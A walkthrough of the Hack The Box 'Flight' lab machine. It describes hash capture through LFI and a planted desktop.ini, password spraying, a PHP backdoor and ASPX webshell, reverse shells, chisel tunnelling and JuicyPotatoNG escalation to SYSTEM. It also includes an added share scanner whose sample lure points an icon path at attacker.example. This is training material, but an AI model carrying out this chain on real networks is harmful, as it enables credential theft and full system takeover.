In this post, I would like to share a walkthrough of the Flight machine from Hack The Box.
This machine is rated Hard on Hack The Box.
What will you gain from the Flight machine?
For the user flag, you need to capture Net-NTLMv2 hashes, which we can crack to a plaintext password with hashcat. I will use crackmapexec to run a password spray and find other users who reuse the same password. We also have write access to a share, which lets us drop a malicious file onto the SMB share.
For the root flag, you need to authenticate on the network as the machine account, upload a simple ASPX webshell to execute commands and obtain a shell connection back to us, and then use JuicyPotatoNG to obtain a root shell.
Information Gathering on Flight Machine
Once the VPN connection is started (the connection pack is downloaded from Hack The Box), we can begin information gathering on the machine by running nmap -sC -sV -p- <IP Address> -PN
Let’s access the website interface.
The website looks like an airline website.
Let’s enumerate directories with gobuster, but nothing looks interesting at all.
As a result, let’s enumerate subdomains, which might help us with further escalation.
The subdomain’s site looks like nothing much, but the text appears to be in Latin.
When accessing the “About Us” page, it looks like it might be vulnerable to a Local File Inclusion attack.
Therefore, let’s test by entering “index.php”, and the page looks a little off.
The website responds with “Suspicious Activity Blocked”.
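The “Suspicious Activity Blocked” response is the signature of a substring denylist in front of the include. The following is an added example (not code from the Flight site, which is PHP) that models a `?view=` include in Python: a denylist resolver beside an allowlist resolver, to show why the denylist approach still lets an unexpected UNC-style path reach the include while the allowlist only ever resolves names the application defines. The page directory, the denylist entries and the page names are assumptions made for the example.

```python
"""Page-include resolver: substring denylist beside an allowlist mapping.

Added illustration of the filtering weakness behind the "Suspicious Activity
Blocked" page; not the Flight site's own code. PAGES_DIR, DENYLIST and
ALLOWED_VIEWS are assumed values for this example.
"""

PAGES_DIR = "/var/www/html/pages"  # assumed location of the view files

# Denylist: the kind of substring filter that produces a "blocked" page.
DENYLIST = ("..", "/etc/", "index.php", "php://", "filter")


class BlockedRequest(ValueError):
    """Raised when a resolver refuses the requested view."""


def resolve_denylist(view):
    """Model of include($_GET['view']) guarded only by a substring denylist.

    Returns the include target unchanged when no denied substring is present,
    so anything the list author did not think of (e.g. a UNC path) passes.
    """
    lowered = view.lower()
    if any(bad in lowered for bad in DENYLIST):
        raise BlockedRequest("Suspicious Activity Blocked")
    return view


# Allowlist: the only views the application knows how to render.
ALLOWED_VIEWS = {
    "home": "home.html",
    "about": "about.html",
    "contact": "contact.html",
}


def resolve_allowlist(view):
    """Return a fixed path for a known view name; reject everything else."""
    try:
        return PAGES_DIR + "/" + ALLOWED_VIEWS[view]
    except KeyError:
        raise BlockedRequest("unknown view") from None


def is_blocked(resolver, view):
    """True when `resolver` refuses `view`; used to compare both policies."""
    try:
        resolver(view)
    except BlockedRequest:
        return True
    return False


if __name__ == "__main__":
    for candidate in ("about", "about.html", "index.php", r"\\host\share\x"):
        print(f"{candidate!r:24} denylist blocked={is_blocked(resolve_denylist, candidate)} "
              f"allowlist blocked={is_blocked(resolve_allowlist, candidate)}")
```

The allowlist resolver never passes user input into a path at all: the request selects a key, and the application supplies the file name.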
As a result, let’s start Responder so that we can capture the hash.
We also need to start our SMB server, as shown above.
Let’s capture the hash by executing the command above.
Finally, we retrieved the hash as expected.
Using hashcat, we obtained the password from the hash.
Using Crackmapexec for Flight machine from our attacker’s machine
My operating system doesn’t have crackmapexec for some reason, so let’s install it. Sadly, the tool cannot be installed at all.
After a while of troubleshooting, I gave up on using crackmapexec on Parrot OS and switched to Kali Linux for this step only.
The screenshot above shows the crackmapexec run; let’s move back to our Parrot OS machine.
The command above shows the shares that the user can access on the machine.
From the result, let’s access one of the shares that svc_apache has permission on.
Let’s access the Shared share using S.Moon’s credentials, and we see nothing.
Using impacket-smbexec, we can find out which share is writable. However, there seems to be custom code that prevents many file types from being written:
As a result, we can create a fake desktop.ini file and put it on the server via smbclient.
Therefore, we can upload the file by running the command “put desktop.ini”.
We crack the new hash and get C.Bum’s password.
At least we got the password for c.bum.
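The desktop.ini drop works because Explorer parses that file automatically when a user browses the folder and fetches whatever icon resource it names, so a share that allows anonymous or low-privileged writes should be checked for such files. The following is an added example (not from this walkthrough or any of its tools) that walks a local copy or mount of a share and reports desktop.ini, .scf and .url files whose icon keys point at a UNC path. The sample share layout it builds in a temporary directory, including the lure host name, is constructed for the example.

```python
"""Scan a share export for files that point icon lookups at remote UNC paths.

Added defensive example; not code from the Flight walkthrough. Give scan_share()
the root of a mounted or copied share and it returns (relative path, key, value)
for every desktop.ini / .scf / .url whose icon key names a \\\\host\\... path.
"""
import os
import re
import tempfile

# File names Explorer parses on its own when a folder is browsed.
LURE_NAMES = {"desktop.ini"}
LURE_EXTENSIONS = {".scf", ".url"}

# Keys whose value Explorer resolves as an icon resource (case-insensitive).
ICON_KEYS = re.compile(
    r"^\s*(IconResource|IconFile|IconPath)\s*=\s*(.+?)\s*$",
    re.IGNORECASE | re.MULTILINE,
)
# A UNC path: two backslashes, a host name, a backslash.
UNC_PATH = re.compile(r"^\\\\[^\\]+\\")


def is_candidate(name):
    """True for file names Explorer treats as folder/shortcut metadata."""
    lower = name.lower()
    return lower in LURE_NAMES or os.path.splitext(lower)[1] in LURE_EXTENSIONS


def scan_share(root):
    """Return [(relative_path, key, value)] for icon keys that reference UNC paths."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not is_candidate(name):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            for key, value in ICON_KEYS.findall(text):
                if UNC_PATH.match(value):
                    findings.append((os.path.relpath(path, root), key, value))
    return findings


def build_sample_share():
    """Create a constructed share layout: one benign desktop.ini and one lure."""
    root = tempfile.mkdtemp(prefix="share_")
    os.makedirs(os.path.join(root, "Shared", "docs"))
    # Benign: icon taken from a local system DLL.
    with open(os.path.join(root, "Shared", "docs", "desktop.ini"), "w") as fh:
        fh.write("[.ShellClassInfo]\nIconResource=C:\\Windows\\System32\\SHELL32.dll,3\n")
    # Lure (constructed host name): icon fetched from a remote share, which
    # makes the browsing client authenticate to that host.
    with open(os.path.join(root, "Shared", "desktop.ini"), "w") as fh:
        fh.write("[.ShellClassInfo]\nIconResource=\\\\attacker.example\\share\\icon.ico\n")
    return root


if __name__ == "__main__":
    for rel, key, value in scan_share(build_sample_share()):
        print(f"{rel}: {key} -> {value}")
```

Run it against the share root on a schedule, or from a file-server audit job; a legitimate desktop.ini almost always references a local DLL or .ico, so any UNC value deserves a look.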
By using a similar method, we added simple_backdoor.php to the machine via c.bum’s access.
The content of the file would be something like the above.
Let’s start our Python web server.
We managed to transfer the file to the server using the Python web server.
Finally, we have successfully accessed the machine via the reverse shell connection.
Again, we need to start our Python web server on a different port.
Therefore, let’s start our nc listener.
As a result, the file “RunasCS.exe” has been downloaded onto the machine.
Let’s run the command above to obtain the reverse shell connection.
Finally, we succeeded in getting the connection back to us.
Access with c.bum’s privileges
We can read the user flag by running the command “type user.txt”.
Escalate to Admin Privileges Access on Flight Machine
Let’s check which ports are listening on the server.
Let’s transfer chisel to the victim machine.
On the attacker’s machine, we need to execute the command above.
On the other side, we are required to execute the command above.
The website will look something like the screenshot above.
Let’s find a webshell on the internet.
As a result, we need to upload cmdasp.aspx to the victim machine.
We need to transfer the file to c:\inetpub\development\
We can verify that the file is stored there by looking inside the directory.
As another step to ensure cmdasp works, we need to execute certutil.exe.
Uwu! It works as I expected.
Let’s start our nc listener.
Let’s enter the command so that we will be able to obtain the reverse shell connection.
Therefore, let’s upload nc.exe onto the victim machine.
Let’s use a different cmd interface.
It looks like it works, but the connection dies after a while.
After a few tries, we finally managed to get the reverse shell connection.
From the privilege information shown in the screenshot above, we know that the account’s privileges make a JuicyPotato-style escalation possible.
As a result, let’s download JuicyPotatoNG onto the victim machine.
To obtain nt authority\system privileges, we need to execute the command above.
Boom! We succeeded.
We can read the root flag by running the command “type root.txt”.